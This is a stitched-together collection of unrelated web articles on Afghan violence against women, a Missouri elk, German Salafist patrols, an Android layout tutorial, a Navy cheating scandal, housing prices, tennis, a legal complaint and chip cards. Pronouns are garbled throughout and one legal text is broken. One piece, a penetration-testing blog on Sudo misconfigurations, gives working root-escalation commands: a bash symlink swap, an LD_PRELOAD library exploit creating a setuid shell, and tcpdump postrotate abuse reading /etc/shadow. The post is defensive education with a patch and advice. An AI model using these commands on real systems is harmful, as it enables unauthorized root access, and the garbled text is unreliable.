`` I got married to a man in Sawa village of Anjil district five months ago . My husband and my father-in-law had beaten me without any reason several times . The repeated mistreatment had forced me to complain , but all in vain as the prosecutor in Herat city overlooked my petition and warned me to either withdraw the complaint or face imprisonment , '' the badly injured bride told Xinhua from their bed in hospital .
Mariam weeps over their daughter , Najiba , 13 . Najiba who had been married six months , claimed that their mother-in-law doused them with gasoline and set them on fire , through their mother , and other nurses in the hospital , were skeptical of their story , and suspected they might have burned themselves in an attempted suicide . ( Photo : Lynsey Addario / NYTimes )
More photos by Lynsey Addario Mariam weeps over their daughter , Najiba , 13 . Najiba who had been married six months , claimed that their mother-in-law doused them with gasoline and set them on fire , through their mother , and other nurses in the hospital , were skeptical of their story , and suspected they might have burned themselves in an attempted suicide . ( Photo : Lynsey Addario / NYTimes )
`` The last time I sought justice on Monday , the prosecutor again warned me of dire consequence if I refuse to withdraw my complaints .
`` Such behavior left me with no choice but self-immolation because it was the only way to get rid of violence and insult , '' the severely burned lady murmured in their bed .
The doctor treating them in Herat hospital was skeptical of their recovery .
`` She is in critical condition as 80 percent of their skin is burned . they have only 20 percent chance to survive , '' a doctor in the hospital told Xinhua .
This is not the first case of violence against women in post- Taliban Afghanistan .
For instance , Sahar Gul , a 15-years old girl from northern Baghlan province , was found by police last December to have been locked in an underground cell for six months by them in-laws .
Women 's life has been tremendously changed in post-Taliban Afghanistan compared with a decade ago when Taliban regime ruled the country , but Afghan women are still suffering .
Taliban regime had confined women to their houses and outlawed schooling for girls . But in today 's Afghanistan women are active in political , economic and social activities .
There are three women in Afghan cabinet and several women in parliament . Meanwhile , 30 percent of more than 8 million school children are girls .
Nevertheless , in the war-torn and conservative Afghanistan some traditional practices that violate women 's rights are still widespread . Child marriage , forced marriage and exchange marriages are singled out by right activists as the most common violations .
`` We presented our petition and complaints three months ago to get justice but have been overlooked , because the father-in-law of my daughter is an influential gun lord , '' the dejected mother standing alongside the bed of their burned daughter told Xinhua .
`` This is my earnest demand not to trample the right of a woman and bring to justice those behind the crime as soon as possible , '' the mother of the young victim said .
CLOSE Fall is a prime time to hear elk bugling in the wild . A self-guided auto tour in southeast Missouri provides the opportunity to possibly see and hear this majestic animal . Video courtesy of Missouri Department of Conservation
Abby Wilson , left , and MDC agent Adam Doerhoff , after Abby accidentally shot this bull elk Saturday , thinking it was a big white-tail buck . ( Photo : Donald White )
A young Missouri hunter who shot an elk by mistake wo n't get to keep the meat , hide or big antlers .
Abby Wilson , 14 , shot the elk on Saturday in Boone County , thinking it was a large white-tailed buck . Them father , Donald White , immediately called the Conservation Department upon realizing their daughter 's mistake .
White said they later spoke with conservation officials in hopes they would let them keep the antlers , cape and meat , which they said would be shared with their family .
`` I 'd make sure everybody around my family would have some of that , '' said White , who was nearby but not with Abby when they killed the bull elk with a single shot from their .243-caliber rifle .
`` As I understand it , they ( MDC ) hold the rights to any game in Missouri , '' White said . `` We got a good relationship going with them , so we hope something positive comes out of it . ''
MDC is refrigerating the elk carcass and may donate the meat to needy families if it passes its CWD test .
Abby 's story went viral Monday , with hundreds of people posting comments about their mistaking an elk for a white-tailed deer . White said they were upset by some of the comments that they felt amounted to bullying their young daughter over their mistake .
Abby Wilson , 14 , said they thought they were shooting a big white-tailed deer on Saturday . It turned out to be an elk . ( Photo : Donald White )
`` There 's no sense in it , people doing that , '' they said . `` Do n't come at my daughter saying lock them away . Wow . If my daughter gets fined , I 'll pay it and move on . So be it . We 'll deal with it . ''
As of Tuesday , conservation officials had not finished their investigation into the unusual case and had not decided if any warnings or citations would be issued .
`` There is no elk season in Missouri , so free ranging elk are protected , '' said Tom Strother , an MDC Protection Regional Supervisor . `` It is a Wildlife Code violation to shoot a free ranging elk as there are no provisions that outline a hunting season like there is for white-tailed deer . ''
Strother said MDC staff talked to White on Monday `` and informed them that no parts of the elk will be returned to them or the family . ''
The healthy bull elk is being tested for Chronic Wasting Disease , and DNA samples were collected to try to determine where the elk came from . It had no ear tags , collar or other markings .
Missouri 's Wildlife Code sets out many aspects of how the state 's wildlife can be taken or managed . Strother laid out how Abby 's mistaken elk fit into the code .
The code is `` permissive , '' meaning it sets out actions and activities that are permitted in Missouri . If they are n't specifically permitted , they are considered illegal , according to the code .
`` Since there are no rules specifically permitting the shooting/hunting/killing of an elk it is prohibited to do so , '' Strother wrote .
`` You can also Google something like 'Wildlife Code of Missouri rule 4.110 General Prohibitions ' and find the entire wording on the Secretary of State 's website . ''
Read more :
.
Read or Share this story : http : //sgfnow.co/2ig5s1K
Home / Section : Comic history
Schulz put * sigh * in American print vernacular
John Gruber , of Mac blog Daringfireball fame , noted the increasing number of times they see people use ( * cough * ) as a visual indicator of a verbal response to something the author just stated . After tweeting their curiosity on the matter , David Friedman ran it through Google Books looking to see when it started * cough * came into wide usage . Also searched was the word * sigh * .
What they found was * cough * began in the 1990 's and really took off in the 2000 's which makes sense as early internet email and forums did n't have the ability to italicizes words so wrapping them in asterisks was the norm . But * sigh * predates the Internet by several decades appearing in the 1960 's . Their theory of where * sigh * comes from :
Like this : Like Loading ...
People attend a rally organised by Iraqi Christians in Germany denouncing what they say is repression by the Islamic State militant group , in Berlin , August 17 , 2014 . — Reuters pic
BERLIN , Sept 9 — German politicians and media yesterday called for a crackdown on radical Islamist propaganda after ultra-conservative Salafists took to the streets calling themselves the “ Sharia Police ” .
Chancellor Angela Merkel hinted that laws could be tightened after a small group of men wearing orange vests with “ Sharia Police ” written on them , went on a series of “ patrols ” in the western city of Wuppertal .
“ The state has the monopoly on legitimate force , ” they told Sat1 television .
“ No one else is authorised to replace the police . ”
The so-called Sharia Police reportedly told nightclub-goers to refrain from drinking alcohol and listening to music , and arcade customers not to play games for money .
A video circulating online shows patrols being conducted by Sven Lau , a German Salafist convert who claims to be one of those behind the idea .
Under current German law , the “ Sharia Police ” could at most face a charge of disturbing public order .
Police said the patrols took place last week and urged people to contact them if they saw suspicious behaviour linked to Salafist activity .
No arrests have been made so far , but political leaders warned they would crack down on the Islamist patrol if it took its campaign any further , while the conservative daily Die Welt declared , “ No tolerance for Salafists . ”
“ We will not tolerate illegal parallel justice , ” warned Justice Minister Heiko Maas .
“ Sharia law is not tolerated on German soil , ” Interior Minister Thomas de Maiziere told Saturday 's Bild newspaper .
Bavaria 's interior minister Joachim Herrmann described it as a “ direct attack by the Salafists on our rule of law ” , in comments published in yesterday 's Bild daily .
Stephan Mayer , also from the CSU Bavarian allies of Merkel 's conservatives , called in Sunday 's Tagesspiegel for promoting strict sharia law to be “ penalised ” .
Volker Kauder , the parliamentary group leader of Merkel 's conservatives , said that the police alone was responsible for upholding public order .
“ Therefore we must examine a ban of these supposed guardians of Islamic virtues , ” they told the Welt am Sonntag .
The head of the Central Council of Muslims in Germany has also condemned the action by the Salafists in Wuppertal .
German intelligence last year voiced concern over the growing number of Salafists , who espouse an austere form of Sunni Islam , and said they numbered around 4,500 in the country .
“ Salafists and fanatics should no longer be able to hide behind religious freedom , even Islamic groups concerned with the reputation of Muslims see it that way , ” said Die Welt . — AFP
In May 2016 a new project was pushed to the official Google Github repo named flexbox-layout . It is an Android layout manager which offers similar behaviour to the CSS flexible box layout module . In this series we 'll take a look at FlexboxLayout and try and gain some insights in to how it works and how to get the best out of it .
Before we dive in it is worth mentioning that the format of this series is goiing to be a little different to normal . Normally I like to annotate working code , but in this case the requirements are a little different . The code itself is n't actually going to change a great deal , but we 're going to be exploring the effects of changing XML asttributes on the layout itself and the child items . To achieve this there is a companion app which has been published to Google Play Store which allows you to control the various attributes . The source code of the app will be published in due course , but in the meantime I courage you to download the app and play along as we go !
It is also worth mentioning that I shall be approaching the explanations in this series very much from an Android perspective – that is , I 'll be using the standard Android layouts as a point of reference and highlighting where FlexboxLayout can give similar results .
To use FlexboxLayout in your project first add a dependency to your build.gradle :
build.gradle dependencies { compile 'com.google.android : flexbox:0.1.2 ' } 1 2 3 dependencies { compile 'com.google.android : flexbox:0.1.2 ' }
Then it is simply a case of including it in your XML layouts ( or programatically , if necessary ) – I wo n't go in to more detail here as the examples on the Github repo should be more than sufficient .
In very basic terms , FlexboxLayout is closest to LinearLayout because it positions its children sequentially – each child is positioned after the previous one . One thing that we need to do with LinearLayout is set the orientation , and that brings us neatly on to the first attribute of FlexboxLayout that we 're going to look at :
flexDirection
This controls the direction of flow when laying out the children and is , as already suggested , similar to how orientation works for LinearLayout . The values row and column are equivalent to horizontal and vertical orientations respectively . However there are also two other values we can use row_reverse and column_reverse these do exactly the same thing only they lay the children out in the opposite direction . For example , row will start at the left and will place each subsequent child to the immediate right of the previous one :
Conversely row_reverse will start at the right and place each child to the immediate left of the previous one :
There are a couple of terms which we need to define here as they will be referenced throughout the remaining definitions . The main axis is the direction of flow defined by the flexDirection and the cross axis is the axis perpendicular to the main access . So for row and row_reverse the main axis would the horizontal axis and the cross axis would be the vertical axis . Remember these – you 'll need them later !
flexWrap
The first major difference between FlexboxLayout and LinearLayout is the behaviour when the flowed children reach the bounds of the layout itself . For LinearLayout the children are simply clipped so that once the layout bounds have been exceeded , adding subsequent child Views will simply position them outside of the layout . With FlexboxLayout we can control this behaviour using the flexWrap attribute . If we set this to nowrap then when we add children after we have filled the layout along the main axis , they will be added at the end and preceding children will be shrunk to make room . There is some finer-grained control that we can do on this , and we 'll discuss this when we look at child attributes later in the series .
justifyContent
The way that child items are positioned along the main axis is controlled by justifyContent . At a superficial glance this may appear similar to flexDirection , until we look at it a little closer . flexDirection controls the order of the child items whereas justifyContent controls the relative positioning . The possible values are flex_start , flex_end , center , space_between , & space_around :
alignItems
alignItems controls the positioning and sizing of items along the cross axis . The possible values are stretch , flex_start , flex_end , center , and baseline :
alignContent
This is where it can get slightly confusing because alignContent appears be the same as alignItems but actually there is a subtle difference which has a major effect on behaviour ! Whereas alignItems controls how items are positioned within their own line , alignContent controls the line itself . In Android-like terms it 's similar to TableRow within TableLayout : Using alignContent is similar to applying layout attributes to TableRow ; whereas alignItems is similar to applying layout attributes to the child views representing the individual table cells . The possible values are stretch , flex_start , flex_end , center , space_between , & space_around :
The best way to get an understanding of alignItems & alignContent really is to play with it . In my app , set flexDirection to Row , set Flex wrap to Wrap , add some additional cells ( by clicking the AppBar “ Add ” action ) until it wraps on to a second row , set alignContent to stretch to enable you to visualise the line dimensions , and then play with different values of alignItems .
So that 's pretty powerful and flexible ( yeah , I know ! ) stuff . But there 's a lot more . In the next article we 'll look at how we can control individual child items as well .
The app is available in the Google Play Store , and the source code for the app will be published at the conclusion of this series .
© 2016 , Mark Allison . All rights reserved .
Related
Copyright © 2016 Styling Android . All Rights Reserved .
Information about how to reuse or republish this work may be available at http : //blog.stylingandroid.com/license-information .
On Aug. 20 , the Navy dismissed 34 sailors for cheating on an important nuclear-power test . The sailors were all enlisted staff instructors at the Nuclear Power School in Goose Creek , South Carolina . The instructors had been passing out the answers to the tests they were administering . This is yet another in a long line of ethical disasters in the military recently . Back in March , the Air Force dismissed nine commanders amid another cheating scandal . In late December , the Pentagon fired an Air Force major general for getting shit-faced in Moscow while on official business . Also at the end of last year , the Navy investigated senior officers for accepting bribes from a Malaysian contractor . At first glance , the instructors ' dismissal seems like progress for the Defense Department . The Navy discovered a problem , investigated it and disciplined the perpetrators . But a closer look at the sailing branch 's report about the scandal reveals some worrying details … and evidence that maybe the Navy has n't righted the ship . The cheating in South Carolina went on for seven long years . Sailors lied to investigators ' faces . Commanders either were complicit or—equally worrying—totally ignorant of their subordinates ' systematic violations . And there still are too many unanswered questions .
The former USS Daniel Webster . Navy photo
Sailors at the Nuclear Power School take several tests as part of the Engineering Watch Supervisor exam . The tests help qualify them to operate the nuclear reactors that power aircraft carriers and submarines . The staff instructors use several different versions of the test and assign them randomly to students . Some of the sailors training aboard the former USS Daniel Webster—a non-deploying instructional submarine—knew which version of test they were going to take , as well as all of the answers . They knew because their instructors had told them . Sailors on the training ship passed the answers to each other via email and thumb drives . The investigation reveals that sailors knew who had the files . All they had to do was ask . Sometimes , they did n't have to ask at all . More than one sailor received unsolicited copies of the test via email . The instructors passed out the tests to anyone who asked . They “ had likely already cheated before they assumed their position [ as instructors ] , ” the Navy concluded . The instructors got to their positions because they themselves had cheated on the tests . Then they passed on their knowledge to their students . This went out for seven years . The cheaters institutionalized their deceit . Here 's a galling detail . The instructors received mandatory integrity training before administering the exams . They signed a piece of paper attesting to their honesty . As part of the exam process , the instructors had to remind sailors of the consequences of cheating before every test . Mere paper . Empty words . Yes , these exams are hard . The workload is heavy at the nuclear school . Everyone else was cheating , making it easier and easier for successive generations of trainees to accept that maybe it was okay getting the exam answers from the instructors . The sailor who blew the whistle on the cheating did so only because they saw a news report about the Air Force 's recent nuclear cheating scandal . That emboldened them . Even then , the whistleblower was scared of possible retaliation . When the Navy asked other sailors why they did nothing , they said they feared “ the repercussions and consequences to them or their shipmates. ” On top of all that , the Navy caught 27 people lying to the investigators about cheating .
Navy photo
By Sebastien Macke , @ lanjelot
Introduction
During security engagements , we regularly come across servers configured with the privilege management software Sudo . As with any software , the principle of the least privilege must be closely followed , users must be granted the minimum possible privileges to perform necessary tasks or operations . Therefore to securely configure Sudo , user accounts must be restricted to a limited set of commands that they can legitimately execute with elevated privileges ( usually those of the root account ) .
Out in the real world , we do n't often see Sudo configured according to the principle of the least privilege . But when we do , we always uncover a mistake or two that allows us to escalate our privileges to root , at which point it 's game over . We win .
The purpose of this post is to present a series of examples of common mistakes and insecure configurations that we have seen and leveraged on production environments during security assessments and how you can make our team 's life that little bit harder .
Insecure File System Permissions
Consider the following Sudo configuration for our fictitious user account “ appadmin ” :
$ sudo -l [ sudo ] password for appadmin : User appadmin may run the following commands on this host : ( root ) /opt/Support/start.sh , ( root ) /opt/Support/stop.sh , ( root ) /opt/Support/restart.sh , ( root ) /usr/sbin/lsof
It all looks good so far . So let 's have a look at these scripts :
$ ls -l /opt/Support/ total 4 -rwxr-xr-x 1 root root 37 Oct 3 14:06 restart.sh -rwxr-xr-x 1 appadmin appadmin 53 Oct 3 14:03 start.sh $ ls -ld /opt/Support drwxr-xr-x 2 appadmin appadmin 4096 Oct 3 13:58 /opt/Support
Do n't these file and directory permissions look interesting ? We have several options to escalate our privileges here , we could either :
Create the non-existent file “ stop.sh ” Modify the existing file “ start.sh ” Move the file “ restart.sh ” and create another file with the same filename
Here is a demonstration of the third option :
$ mv /opt/Support/restart.sh { , .bak } $ ln -s /bin/bash /opt/Support/restart.sh $ sudo /opt/Support/restart.sh [ sudo ] password for appadmin : # id uid=0 ( root ) gid=0 ( root ) groups=0 ( root )
Game over ! : )
Environment Variables
Consider the following Sudo configuration for our user account “ monitor ” :
$ sudo -l [ sudo ] password for monitor : Matching Defaults entries for monitor on this host : ! env_reset User monitor may run the following commands on this host : ( root ) /etc/init.d/sshd
The env_reset option is disabled ! This means we can manipulate the environment of the command we are allowed to run . Depending on the Sudo version , we may be able to escalate our privileges by passing environment variables , as illustrated by the following well-known exploits :
PS4 ( breno )
LD_PRELOAD ( Kingcope or Sensepost )
Also keep in mind that there may be other dangerous environment variables that we could misuse ( think of PERL5OPT , PYTHONINSPECT etc . ) .
It should be noted though , that even when env_reset is disabled , most dangerous environment variables are now safely removed by Sudo , based on a default hard-coded blacklist . Run “ sudo -V ” as root to see this blacklist under “ Environment variables to remove ” .
However , in Sudo < 1.8.5 , we found that environment variables passed in on the command line are not removed even though they should be . Thus we can still escalate our privileges using for example the LD_PRELOAD technique , as demonstrated below on a fully up-to-date Red Hat Enterprise Linux 5.10 system ( only missing the recent security update of course ) :
$ rpm -q sudo sudo-1.7.2p1-28.el5 $ cat > xoxo.c < < 'LUL ' # include < unistd.h > # include < stdlib.h > void _init ( ) { if ( ! geteuid ( ) ) { unsetenv ( `` LD_PRELOAD '' ) ; unlink ( `` /tmp/libxoxo.so.1.0 '' ) ; setgid ( 0 ) ; setuid ( 0 ) ; execl ( `` /bin/sh '' , '' sh '' , '' -c '' , '' cp /bin/bash /tmp/.bash ; chown 0:0 /tmp/.bash ; /bin/chmod +xs /tmp/.bash '' , NULL ) ; } } LUL $ gcc -o xoxo.o -c xoxo.c -fPIC $ gcc -shared -Wl , -soname , libxoxo.so.1 -o /tmp/libxoxo.so.1.0 xoxo.o -nostartfiles $ sudo LD_PRELOAD=/tmp/libxoxo.so.1.0 /etc/init.d/sshd blaaah [ sudo ] password for monitor : $ /tmp/.bash -p -c 'id ; head -n 1 /etc/shadow ' uid=500 ( monitor ) gid=500 ( monitor ) euid=0 ( root ) egid=0 ( root ) groups=500 ( monitor ) root : $ 1 $ VjDVB93E $ AUL2Mg1L2gH70HHxh2CEr/:16128:0:99999:7 : : :
The bug is located on line 685 of the file sudo-1.8.4p5/plugins/sudoers/env.c , where a boolean comparison is performed incorrectly . The following patch fixes this issue :
-- - sudo-1.8.4p5/plugins/sudoers/env.c 2012-03-30 04:37:01.000000000 +1100 +++ sudo-1.8.4p5-fixed/plugins/sudoers/env.c 2014-02-28 10:36:14.623915000 +1100 @ @ -682,7 +682,7 @ @ okvar = matches_env_keep ( * ep ) ; } else { okvar = matches_env_delete ( * ep ) == false ; - if ( okvar == false ) + if ( okvar == true ) okvar = matches_env_check ( * ep ) ! = false ; } if ( okvar == false ) {
In Sudo 1.8.5 , the affected code was actually changed and cleaned up which silently fixed the issue . As a result , in Sudo 1.8.5 and above , environment variables passed in on the command line are properly removed .
Note that RHEL 5.10 was vulnerable because it ships the 1.7.2p1 version ( with every previous security patches applied ) and similarly , RHEL 6.0 through 6.3 inclusive ship a version from the 1.7 branch . However RHEL 6.4 was not vulnerable because it ships the 1.8.6p3 version .
We responsibly disclosed this security issue to the vendor , and within a week , the vulnerability was assigned CVE-2014-0106 , the details were made public and the 1.7.10p8 security fix was released . While security updates are being rolled out for the affected distributions , a simple workaround is to simply not disable env_reset , which is the default behaviour .
Escape to shell
Consider the following Sudo configuration for our user account “ john ” :
$ sudo -l [ sudo ] password for john : User john may run the following commands on this host : ( root ) /usr/sbin/tcpdump
In this case , john is able to capture network traffic . A perfectly legitimate task for a system administrator , so what could possibly go wrong ? The “ -z postrotate-command ” option ( introduced in tcpdump version 4.0.0 ) , is worth knowing :
$ echo $ 'id
cat /etc/shadow ' > /tmp/.test $ chmod +x /tmp/.test $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root [ sudo ] password for john : tcpdump : listening on eth0 , link-type EN10MB ( Ethernet ) , capture size 65535 bytes Maximum file limit reached : 1 uid=0 ( root ) gid=0 ( root ) groups=0 ( root ) context=unconfined_u : unconfined_r : unconfined_t : s0-s0 : c0.c1023 root : $ 6 $ CnflBAm.SEqAN6Rz $ rZhceJkWQlw1Dl1LaWltiT.cIhXyHtk5Ot2C7mMygrr7XBhJFzLkO8RKphzgowaYUMJHiO2MB9oBRCKFQAWoz0:16138:0:99999:7 : : : bin : * :15980:0:99999:7 : : : ...
Note that “ -Z root ” is required on RedHat-based distributions ( Fedora , CentOS , etc . ) as they patch the tcpdump package to drop root privileges before handling savefiles .
So what can you do to protect yourself against Sudo abuse ? Make sure you scrutinise every program that a user is allowed to run with elevated privileges as there may be ways for users to break out to a nice # prompt . For example , programs such as vi or less , that allow users to invoke arbitrary shell commands ( with ! or similar ) , should be replaced with their more secure counterparts , rvim and cat respectively .
Keen to practice this ? Have a go at the following challenge and find out how to pop a root shell . There are at least two ways that we could think of , but one is more intrusive than the other and will impact the system 's integrity . Leave a comment with your solution ( s ) , we 'll publish ours and the most original submissions after a few weeks to not spoil the fun . The environment is just a standard CentOS 6.5 system , the zip package being the only post “ default ” install addition .
$ cat /usr/local/bin/extract_docs.sh # ! /bin/bash zip -U /root/original-docs.zip -O /var/lib/extracted-docs.zip `` $ @ '' $ ls -ld /root/original-docs.zip /usr/local/bin/ /usr/local/bin/extract_docs.sh /var/lib/ /var/lib/extracted-docs.zip ls : can not access /root/original-docs.zip : Permission denied drwxr-xr-x . 2 root root 4096 Mar 12 17:02 /usr/local/bin/ -rwxr-xr-x . 1 root root 80 Mar 12 17:02 /usr/local/bin/extract_docs.sh drwxr-xr-x . 15 root root 4096 Mar 12 17:02 /var/lib/ -rw-r -- r -- . 1 root root 964 Mar 12 17:02 /var/lib/extracted-docs.zip $ rpm -q zip zip-3.0-1.el6.x86_64 $ sudo -l [ sudo ] password for kevin : Matching Defaults entries for kevin on this host : requiretty , ! visiblepw , always_set_home , env_reset , env_keep= '' COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS '' , env_keep+= '' MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE '' , env_keep+= '' LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES '' , env_keep+= '' LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE '' , env_keep+= '' LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY '' , secure_path=/sbin\ : /bin\ : /usr/sbin\ : /usr/bin User kevin may run the following commands on this host : ( root ) /usr/local/bin/extract_docs.sh
Thanks for reading , now get your thinking caps on !
Warnings of dangerous overheating in Vancouver and Toronto 's real estate markets are mounting , but home prices in those two cities are unlikely to decelerate on their own anytime soon , according to a BMO analysis released June 15 .
BMO economists Doug Porter and Robert Kavcic concluded that any new government policies to cool down the housing market should be directed towards reigning in “ foreign investment , speculation and land restrictions , in that order . ”
Porter and Kavcic pinpoint several factors behind nosebleed-level price accelerations concentrated in those two Canadian cities . A demographic surge of young people aged 25-40 ( prime homebuying years ) combined with the reluctance of baby boomers to downsize means there is a lot of pressure being placed on the detached home market .
They also point out that all of Canada 's net job growth over the past year has occurred in Vancouver and Toronto , and the “ urbanization ” trend — urban service jobs will increase , while resource and manufacturing jobs have decreased — will continue to attract workers to cities .
Demand from foreign buyers is also playing a significant role in these two markets , and is also beginning to play a role in Montreal .
“ While many downplay this factor ( 'it 's only X % of the buyers ! ' ) , Economics 101 will tell you that the marginal buyer sets the price ; and , if you introduce a wave of new buyers on an already tight market , prices will soon reach for the sky as the demand curve shifts even slightly to the right , ” Porter and Kavcic write .
“ Excess global savings sloshing around have driven many asset prices rocketing higher in recent years — bonds , commercial real estate , infrastructure , private equity , residential real estate in Manhattan and London — and now that wave has washed upon Canada 's biggest cities . ”
Both Vancouver and Toronto are now showing signs that speculation is in play : Porter and Kavcic find evidence of speculative behaviour in the increase in number of Vancouver properties being bought and sold within 12 months , and the recent steep increase in condo prices .
The two economists said policymakers should focus on foreign buyers who seek to use real estate as a safe haven , rather than wealthy landed immigrants . Recent policy moves to increase how much homebuyers need to put towards their down payments have focused on domestic buyers ; those measures will “ simply crowd out the domestic buyer and leave the field wider open for foreign capital inflows . ”
The real estate industry and B.C . government have long emphasized supply problems as the main driver of price increases , especially in Vancouver which has a limited land base because of its location between mountains and water . That 's true when it comes to single family homes , say Porter and Kavcic , because a drive towards density in both cities has made detached homes “ a highly-coveted relic of the past. ” However , the economists call total homebuilding activity in both cities “ relatively healthy . ”
The federal government has promised to do a `` deep dive '' to look into Canada 's overheated housing markets .
jstdenis @ biv.com
@ jenstden
Dudi Sela , Israel 's top-ranked men 's singles tennis player , advanced to the third round of Wimbledon play with a stunning come-from-behind win against American John Isner in London on Thursday .
Standing at just six feet and seven inches , Sela , 32 , is ranked 90th in the world . After Thursday 's win , Sela was among the last 32 players left in the tournament .
Sela won Thursday 's second round 6-7 , 7-6 , 5-7 , 7-6 and 6-3 — their second successive Wimbledon five-setter .
Get The Times of Israel 's Daily Edition by email and never miss our top stories Free Sign Up
Sela pumped their fists in the air after defeating the six-foot-ten Isner , ranked 21st in the world .
Moments after coming off the court , Sela said they were “ very happy ” at the win .
“ I think I played a solid match but was maybe lucky with some of the points . I played well on my service games but did n't play so well on his . I stayed around [ the ] same level from the first point . ”
They said the Israeli-like temperatures approaching 30 degrees Celsius ( 86° Fahrenheit ) benefited them as their opponent tired .
“ Sometimes when the sun is on your head like for him , and you hear all these ‘ kadimah 's [ Hebrew for onwards ] , they start feeling even more tired . It helps me and [ I ] like it . ”
Sela said the level of tennis programs in Israel was “ terrible , ” but that there were a couple of young players they hoped would soon join them in playing the grand slams .
No Israeli reached the third round last year .
They will next face Bulgarian Grigor Dimitrov , the world 's 11th highest ranked player .
Sela 's win came two days after they beat Marcell Grenollers in five sets to advance to the second round .
On Wednesday , Sela was dropped from doubles play along with Brazilian Andre Sa after coming up 0-2 against American Nicholas Monroe and Australian Artem Sitak .
Sela has already reached Wimbledon 's fourth round , in the 2009 tournament .
PARTIES 
5 .
Plaintiff Sportsgrants , Inc. ( `` Sportsgrants '' ) is an Oregon not-for profit corporation , with its principal place
o f
business in Hood River , Oregon .
6 .
Sportsgrants
is
informed and believes and thereon alleges that Defendant CrossFit , Inc. ( `` CrossFit '' ) is , and at all times mentioned herein was , a Delaware corporation , with its principal place
o f
business
in
Washington DC .
7 .
The true names and capacities
o f
defendant DO ES 1 through 1
0 ,
whether individual , corporate , associate , or otherwise , are presently unknown to Sportsgrants who therefore sues said defendants by such fictitious names . Sportsgrants will seek leave
o f
this Court to amend this complaint to show the true names and capacities
o f
said defendants when the same have been ascertained , or according to p ro of present ed at trial .
8 .
Sportsgrants
is
informed and believes and on that basis alleges that at all times mentioned herein , each
o f
the defendants , including those sued
as
DOES 1 through
10
( collectively , `` Defendants '' ) , was the agent
o f
each
o f
the remaining defendants , and
in
doing the things hereinafter alleged , was acting within the course and scope
o f
such agency and with the permission , consent
o f
and ratification by their co-defendants . GENERAL ALLEGATIONS
9 .
CrossFit
is
in the business
o f
offering fitness training services through its website , and also through gym facilities located throughout the United States , including in Oregon , and abroad .
10 .
Sportsgrants
is
informed and believes and on that basis alleges that these gym facilities are independently owned and operated by what CrossFit refers
SCHWABE , WILLIAMSON
&
WYAn ,
PC
Attorneys al Law
P a g e 3 - C O M P L A I N T
Pacwest
Center
1211
SW
51h
Ave. , Suile 1900  Portland ,
OR
97204  Telephone 503.222.9981 Fax 503 . 796 . 2900 
PDXl1198021l638011MAC/8887676.1
U.S. banks and retailers , a decade behind in deploying the secure , high-tech credit cards used elsewhere in the world , may take years longer to switch to a system that all but eliminates common types of fraud .
Under pressure from credit card companies , major banks and retailers have begun to roll out the cards , which carry a computer chip and advanced security software that keeps the customer 's account number and other details invisible , even if crooks manage to steal records from a store or bank .
But the conversion could take years to reach critical mass amid a squabble over who will foot the estimated $ 8 billion bill , and despite fears that scammers have been targeting the United States because of its outdated technology . U.S. credit card fraud rates , once the lowest in the world , have doubled in the 10 years since chip cards spread through Europe .
The theft of tens of millions of records from Target over the holiday shopping season has focused attention on the United States as a weak link . Lawmakers have begun to call for faster action to secure systems while law enforcement agencies investigate the massive breach , which is thought to have been the work of sophisticated overseas hackers .
But taking even the obvious step of introducing state-of-the-art cards “ will take time . . . . The U.S. is the largest and the most complex market to move , so that will influence the migration , ” said Carolyn Balfany , a senior vice president with MasterCard Worldwide . The large card companies have said that as of late 2015 , they will hold merchants or banks who have not moved to the chip-card system responsible for fraudulent purchases that the advanced cards would have prevented .
View Graphic â & # 128 ; & # 156 ; Smartâ & # 128 ;  banking cards popular everywhere but U.S .
Balfany estimated that even by that deadline , the number of cards and terminals carrying the advanced technology may only be “ in the midrange ” — a vast improvement over the negligible numbers of chip cards and terminals currently in place , but one that would still leave many consumers vulnerable .
Fraudulent purchases using fake credit cards or stolen numbers can be a nightmare for individuals . Consumers are protected under federal law from paying for the purchases but must still deal with the potential damage to their credit record and worry about the risk of more serious forms of identity theft .
Across the country 's sprawling retail economy , however , the cost has been relatively small — as little as $ 1.1 billion a year lost to the fraudulent transactions chip cards are most likely to prevent , according to U.S. Federal Reserve data , an amount that businesses have been willing to absorb rather than invest in a new system .
In a 2012 Federal Reserve Bank of Atlanta study , payments risk expert Douglas King concluded that the level of fraud in the United States was low enough that the business case for chip cards had “ yet to fully crystalize . ”
The conversion has also been tangled in disputes between banks and retailers over the cost of payment processing — the “ interchange ” fees merchants pay to use credit cards — and the risk posed by other types of fraud , such as online scams , that chip cards can not prevent .
The result : While the rest of the world has sped forward , U.S. shoppers remain at risk in a system where old-school magnetic-stripe cards will remain the norm for perhaps several more years . Unlike the chip-bearing cards , data from magnetic strips are easily read and exploited by hackers , who can use the information to make fake purchases , produce counterfeit cards or use in other identity-theft schemes .
Banks typically are introducing the new cards as old ones expire , which means it could take as long as three years to complete the process , given the usual replacement cycle . The larger card-issuers have announced no plans to speed up the process following the Target breach .
Large retailers such as Wal-Mart and Target , meanwhile , have invested in the new terminals needed to read the extra security that chip cards offer , but it 's not clear how long smaller companies or mom-and-pop stores will take to make the conversion .
Ferrall Dietrich , who owns the Chevy Chase , Md. , active-wear shop Core72 , said that they have n't been approached to upgrade their systems . However , they said , even without knowing the cost of an upgrade , they think it would be a step in the right direction .
Since the Target scare , Dietrich said that customers have been asking more questions about security and that adding a more secure process would only improve customer confidence .
“ My gut feeling is that is certainly the right path to go down . The more secure , the better ” they said . “ It 's going to happen , so it 's one of those thing we have to build into plan . ”
In western Europe , where the chip technology first developed , more than 90 percent of retail terminals and 80 percent of cards have been shifted to the chip-based system .
The technology has not eliminated all fraud , but it has lead to a dramatic reduction in some staple criminal tactics . Chip cards are all but impossible to counterfeit , for example , and even if records are stolen from a central company computer or “ skimmed ” from a store terminal , the consumer 's information is inaccessible .
“ Even if you do a systems breach , it makes the data much less valuable , ” said Jack Jania , senior vice president for Gemalto North America , the U.S. subsidiary of a Dutch card-manufacturing company that makes about 2 billion credit , debit and other cards a year . Jania said stolen records from transactions involving chip-bearing cards sell on the black market for perhaps a tenth of what criminals will pay for records derived from magnetic strips .
“ The U.S. is being targeted for these kinds of breaches specifically because you can clone our cards . And on the card black market , the fraudsters are sophisticated enough to know that . ”
